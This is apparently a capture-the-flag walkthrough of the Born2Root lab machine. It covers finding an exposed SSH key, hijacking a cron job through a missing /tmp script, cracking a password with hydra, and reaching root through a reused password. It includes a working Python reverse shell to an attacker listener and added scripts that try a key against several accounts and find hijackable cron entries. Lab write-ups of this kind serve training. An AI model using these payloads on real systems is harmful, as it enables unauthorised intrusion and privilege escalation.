PGP: Born2Root


Generally, this target seems really easy. It is like pentesting a personal PC, but unfortunately I had never had to think about how to attack a personal PC. And the author is very fond of setting rabbit holes.

Scan

It had three open ports: 22, 80 and 111.

image-20220515103050558.png

Leaving 111 (rpcbind) aside, the likely path was finding a secret on the web server and logging in over SSH.

Port 80

image-20220515103250081.png

The web index showed me three names. They were probably the users of the machine.

Dirsearch gave me some files and directories. robots.txt was a rabbit hole.

image-20220515103525420.png

Open the icons directory. Among the many icons you will see a suspicious file named VDSoyouAXio.txt.

image-20220515104053198.png

This was an SSH private key.

Shell as Martin

Combined with the scan, I had three names (martin, hadi and jimmy) and an SSH private key. So I tried to log in.

How to log in over SSH with a key:
1. Copy the key into a text file.
2. Restrict the file's permissions (ssh refuses a private key that other users can read):
    chmod 600 id.rsa
3. Log in:
    ssh martin@192.168.61.49 -i id.rsa
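The three steps above as a script, added here as an example that is not part of the original write-up. It adds the two checks a practitioner wants before spending time on the key: that the file mode is one ssh will accept, and whether the key is passphrase-protected, which tells you whether a password prompt comes from OpenSSH itself or from something on the target after login. The host 192.168.61.49, the key file name and the candidate users martin, hadi and jimmy are taken from this write-up and assumed here; try_users needs a reachable host, the other two functions run offline.

```shell
#!/bin/sh
# Added example, not from the original write-up. Assumes a PEM-style key
# pasted from the web server and user names read off the web index.

# prep_key SRC DST: copy the pasted key to DST with mode 600 and print the
# resulting mode. ssh rejects a key readable by others
# ("UNPROTECTED PRIVATE KEY FILE!"), so this is the step that usually trips people.
prep_key() {
    cp "$1" "$2"
    chmod 600 "$2"
    stat -c '%a' "$2" 2>/dev/null || stat -f '%Lp' "$2"   # GNU stat, then BSD stat
}

# key_is_encrypted KEY: exit 0 if the PEM key carries a passphrase header.
# Newer "OPENSSH PRIVATE KEY" files keep that flag inside the base64 body;
# for those, `ssh-keygen -y -P '' -f KEY` failing is the equivalent check.
key_is_encrypted() {
    grep -qE '^Proc-Type: 4,ENCRYPTED|BEGIN ENCRYPTED PRIVATE KEY' "$1"
}

# try_users KEY HOST USER...: offer the key to each candidate account.
# BatchMode=yes makes ssh fail instead of falling back to a password prompt,
# so an account the key does not match cannot stall the loop.
try_users() {
    key="$1"; host="$2"; shift 2
    for u in "$@"; do
        if ssh -i "$key" -o BatchMode=yes -o ConnectTimeout=5 \
               -o StrictHostKeyChecking=accept-new "$u@$host" id 2>/dev/null; then
            printf 'key accepted for %s\n' "$u"
            return 0
        fi
    done
    printf 'key accepted for none of: %s\n' "$*"
    return 1
}

# Usage (host, key name and users are this write-up's values, assumed here):
#   prep_key VDSoyouAXio.txt id.rsa
#   key_is_encrypted id.rsa && echo 'passphrase needed'
#   try_users id.rsa 192.168.61.49 martin hadi jimmy
```

If try_users reports the key accepted for one user and you are then asked for a password anyway, the prompt is not OpenSSH's: the key was unencrypted and the login succeeded, so whatever asks is running on the target.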

image-20220515105559964.png

After logging in, it asked me for a password. That was just a joke.

Shell as jimmy

Checking the crontab, I found that jimmy ran /tmp/sekurity.py every 5 minutes.

image-20220516093842857.png

However, when I moved to /tmp I didn't find this file. So I used vi to create it, so that jimmy's cron job would send a reverse shell back to my Kali.

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(10)
s.connect(("10.10.14.8", 4444))   # attacker's listener
os.dup2(s.fileno(), 0)            # stdin, stdout and stderr onto the socket
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
import pty
pty.spawn("/bin/bash")

Then I opened nc and got jimmy's shell. But there was nothing useful it could do.
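The cron entry above is hijackable for a general reason: the script it runs is missing and its directory (/tmp) is writable by everyone, so whoever creates the file first runs code as jimmy on the next tick. An existing script that is writable by the current user is the other variant. The audit below is an added shell example, not from the original write-up; it reads a system-style crontab (schedule, user, command) from a file you name and prints one line per entry the current user could take over. The crontab contents in the usage comment are constructed from the entry in the screenshot.

```shell
#!/bin/sh
# Added example, not from the original write-up.

# cron_script_path CMD...: print the script a cron command runs, i.e. the
# first absolute path that is neither an interpreter nor a /dev node.
# Prints nothing (and still exits 0) when the command has no such path.
cron_script_path() {
    for tok in "$@"; do
        case "$tok" in
            /dev/*) ;;
            /*) case "${tok##*/}" in
                    python*|perl|ruby|sh|bash|dash) ;;   # interpreter; keep scanning
                    *) printf '%s\n' "$tok"; return 0 ;;
                esac ;;
        esac
    done
    return 0
}

# hijack_reason PATH: print why PATH can be taken over by the current user,
# or nothing if it cannot. Caveat: run as root, every file looks writable.
hijack_reason() {
    if [ -e "$1" ]; then
        [ -w "$1" ] && printf 'exists and is writable\n'
    else
        dir=$(dirname "$1")
        [ -d "$dir" ] && [ -w "$dir" ] && printf 'missing, parent directory writable\n'
    fi
    return 0
}

# audit_crontab FILE: for each "m h dom mon dow user command" line in FILE,
# print "user script reason" when the script is hijackable.
audit_crontab() {
    file="$1"
    while read -r line; do
        set -f                      # no globbing: the schedule fields are literal '*'
        set -- $line
        set +f
        [ $# -ge 7 ] || continue    # blank, short and VAR=value lines have fewer fields
        case "$1" in '#'*|*=*) continue ;; esac
        user="$6"; shift 6
        script=$(cron_script_path "$@")
        [ -n "$script" ] || continue
        reason=$(hijack_reason "$script")
        [ -n "$reason" ] || continue
        printf '%s %s %s\n' "$user" "$script" "$reason"
    done < "$file"
    return 0
}

# Usage, with a crontab constructed from the entry seen on the box:
#   printf '%s\n' '*/5 * * * * jimmy python /tmp/sekurity.py' > crontab.txt
#   audit_crontab crontab.txt
#   # prints: jimmy /tmp/sekurity.py missing, parent directory writable
```

The same file-permission reasoning applies to /etc/crontab and /etc/cron.d/* on the target, and an interpreter running from a relative path (just `python`) is a separate PATH-hijack question this check deliberately ignores.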

image-20220516094232014.png

Shell as hadi

I tried to find any clue that would lead to a root shell, but found nothing. So I turned to cracking hadi's password. I used hydra for that, and it turned out the password was hadi123.

image-20220516095150880.png

hadi is the first user of this PC.

Privilege Escalation to Root

I tried many things to get a root shell, and spent two days on this target. Only on the second day did I think of trying to log in as root with hadi123.

image-20220516095855443.png

Root reused hadi's password, so I think I took the hard way.

image-20220516100259490.png

...... I don't know what the point of the steps above was.

If you crack hadi first and try that password against root, you only need 5 minutes to get this machine.